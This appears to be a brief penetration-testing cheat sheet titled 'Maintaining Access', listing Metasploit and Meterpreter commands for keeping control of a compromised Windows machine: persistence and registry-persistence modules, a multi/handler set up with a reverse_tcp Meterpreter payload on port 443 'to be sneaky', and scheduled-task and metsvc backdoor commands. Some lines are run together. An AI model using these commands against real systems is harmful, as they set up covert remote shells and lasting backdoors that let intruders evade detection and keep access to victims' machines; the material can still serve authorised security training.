Maintaining Access
meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistencemsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128
Scheduled Tasks
run scheduleme
run schtaskabuseMetsvc
run metsvc -ALast updated